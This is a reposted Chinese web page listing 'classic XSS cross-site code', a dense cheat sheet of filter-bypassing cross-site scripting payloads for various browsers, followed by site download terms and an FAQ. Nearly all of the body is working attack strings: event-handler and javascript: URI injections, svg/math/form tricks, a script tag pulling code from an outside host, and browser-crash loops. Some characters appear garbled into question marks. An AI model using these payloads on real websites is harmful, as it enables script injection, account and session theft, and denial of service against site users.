一些经典的XSS跨站代码整理
<!– " –!><input value="><img src=xx:x onerror=alert(1)//"> <script/onload=alert(1)></script> IE9 <style/onload=alert(1)> alert([0x0D]–>[0x0D]1<!–[0x0D]) 1<!–i document.write(\'<img src="<iframe/onload=alert(1)>\\0">\’); IE8 JSON.parse(\'{"__proto__":["a",1]}\’) location++ IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊) alert(\’aaa\\0bbb\’) IE only show aaa http://jsbin.com/emekog <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera Function(\’alert(arguments.callee.caller)\’)() firefox dos? while(1)find(); <div/style=x:expression(alert(URL=1))> Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode! <applet code=javascript:alert(\’sgl\’)> and <embed src=javascript:alert(\’sgl\’)> umm…cute FF! <math><script>sgl=\'<img/src=xx:x onerror=alert(1)>\'</script> chrome firefox opera vector <svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~ <body/onload=\\\\\\vbs\\\\\\::::::::alert+\’x\’+[000000]+\’o\’+\’x\’+[000000]::::::::> vbs:alert+-[] <body/onload=vbs::::::::alert—-+–+—-1:::::::::> Firefox vector <math><a xlink:href="//mmme.me">click <svg><script>a=\'<svg/onload=alert(1)></svg>\’;alert(2)</script> Inj>> <script/src=//0.gg/xxxxx> << <script>…</script> less xss [code]Webkit X-XSS-Protection header is enabled just now 😛 <svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/ <?xml encoding="><svg/onload=alert(1)// >"> <a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE Also <a `="<img/onerror=alert(1) src=xx:xx>\’></h1>">x</a> <h1 "=\'<img/onerror=alert(1) src=xx:xx>\’></h1> IE only <1h name="<svg/onload=alert(1)>"></1h> <img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE javascript=1;for(javascript in RuntimeObject());javascript==\’javascript\’ <body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object <img src=\’javascript:while([{}]);\’> works in firefox for(x in document.open); Crash your IE 6:> localStorage.setItem(\’setItem\’,1) Only to find \’?\’.toUpperCase()===\’?\’.toUpperCase() J? H? T? W? Y? i? length==2 \’?\’.toUpperCase()==\’I\’ Also \’?\’.toUpperCase()==\’SS\’ \’?.toUpperCase() ==\’FF\’// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST #Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>> Firefox always the most cute data:_,<script>alert(1)</script> <a href="ftp:/baidu.com">xx</a> http://?????????? works in Firefox RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else? location=\’javascript:alert(1)\’ for({} in {}); 興味深いhttp://jsbin.com/inekab for Opera only <a href=https:http://www.google.com>x</a> That\’s a relative path? document.frames==window.frames <a href="jar:xxx" id=x></a> x.protocol==\’http:\’ on #firefox (0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode 😀 127.0×000000001==127.0.0.1 <input value="sefewfewf"/> Chrome input value block <svg><xmp><img/onerror=alert(1) src=xxx:x /> <img src/="><img src=xxx:x onerror=alert(1)//"> 有趣的isindex <isindex formaction=javascript:alert(1) type=submit > chrome:xx – >chrome://crash/ crash? <form action=javascript:alert(1) /><input> Chrome input enter fucked! <form/><button/><keygen/> chrome send empty key,is funny~_~ <form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code [code]<form><input/name="isindex"> when name are isindex does not send key. <form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support . <script language="php">echo 1 ?> Fascinating. fvck:for(_?in?this)_[\’match\’](/.Element$/)&&console.log(_) location.reload(\’javascript:alert(1)\’) //ie only,lol~ {}alert(1) Twitter @jackmasa =P
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 一些经典的XSS跨站代码整理
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html